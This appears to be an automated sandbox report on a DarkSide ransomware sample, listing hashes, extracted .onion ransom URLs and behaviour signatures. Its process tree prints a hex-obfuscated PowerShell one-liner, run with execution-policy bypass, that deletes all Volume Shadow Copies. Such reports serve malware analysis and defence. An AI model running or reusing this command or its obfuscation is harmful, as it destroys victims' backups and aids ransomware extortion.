Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-05-2024 05:55
Behavioral task
behavioral1
Sample
3.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
out.exe
Resource
win7-20240221-en
General
-
Target
3.exe
-
Size
17KB
-
MD5
9009593ebf5ea20407ab19bff045dc9d
-
SHA1
03c1f7458f3983c03a0f8124a01891242c3cc5df
-
SHA256
6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
-
SHA512
fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
-
SSDEEP
384:SGyUrEk/yEoQE+yckIYN/pBa3AWK3T2oTboHblKR/o:l4klFypIYFpB/x9ngbd
Malware Config
Extracted
C:\Users\README.31635a82.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (139) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2292-0-0x0000000000160000-0x0000000000170000-memory.dmp upx behavioral1/memory/2292-23-0x0000000000160000-0x0000000000170000-memory.dmp upx behavioral1/memory/2292-210-0x0000000000160000-0x0000000000170000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2292 3.exe 2292 3.exe 2056 powershell.exe 2292 3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2292 3.exe Token: SeSecurityPrivilege 2292 3.exe Token: SeTakeOwnershipPrivilege 2292 3.exe Token: SeLoadDriverPrivilege 2292 3.exe Token: SeSystemProfilePrivilege 2292 3.exe Token: SeSystemtimePrivilege 2292 3.exe Token: SeProfSingleProcessPrivilege 2292 3.exe Token: SeIncBasePriorityPrivilege 2292 3.exe Token: SeCreatePagefilePrivilege 2292 3.exe Token: SeBackupPrivilege 2292 3.exe Token: SeRestorePrivilege 2292 3.exe Token: SeShutdownPrivilege 2292 3.exe Token: SeDebugPrivilege 2292 3.exe Token: SeSystemEnvironmentPrivilege 2292 3.exe Token: SeRemoteShutdownPrivilege 2292 3.exe Token: SeUndockPrivilege 2292 3.exe Token: SeManageVolumePrivilege 2292 3.exe Token: 33 2292 3.exe Token: 34 2292 3.exe Token: 35 2292 3.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeBackupPrivilege 2676 vssvc.exe Token: SeRestorePrivilege 2676 vssvc.exe Token: SeAuditPrivilege 2676 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2056 2292 3.exe 28 PID 2292 wrote to memory of 2056 2292 3.exe 28 PID 2292 wrote to memory of 2056 2292 3.exe 28 PID 2292 wrote to memory of 2056 2292 3.exe 28 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f0f4c1f3fb34afe4cb1dcfc5d10cbc8b
SHA107e4c1a0c776b8552cabeaa91f19bd458ef5408a
SHA25671978977a81803ec34792fd5d1f0577be42a631ce5f269a66fd36677c200fc41
SHA5125227390e8c7528830a050a51594c12fddd42e03a33db05ea8a7db4695947fbb31251e84698b758052402e8b3d051cefeb442f72f12fb166c51f14dc89ba59f5c
-
Filesize
2KB
MD525d0b19a0ec34a39dfa3e177866f01a3
SHA1a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198